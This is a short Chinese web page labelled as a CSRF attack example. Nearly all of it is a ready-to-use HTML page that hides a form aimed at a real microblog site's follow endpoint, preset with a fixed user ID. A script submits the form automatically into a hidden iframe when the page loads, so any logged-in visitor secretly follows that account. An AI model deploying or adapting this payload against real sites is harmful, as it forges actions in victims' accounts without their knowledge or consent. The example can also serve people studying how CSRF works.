CSRF攻击范例

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>自动加粉丝</title>
</head>

<body>
<div style="display:none">
<form action="http://t.ci123.com/subs/follow.php" name="addForm" method="post" id="addFans" target="ipost">
<input type="text" name="uid" value="1535917"  />
<input type="text" name="types" value="1" />
</form>
<iframe name="ipost" id="ipost"></iframe>
</div>
<script language="javascript">
document.getElementById("addFans").submit();
</script>
</body>
</html>

发表评论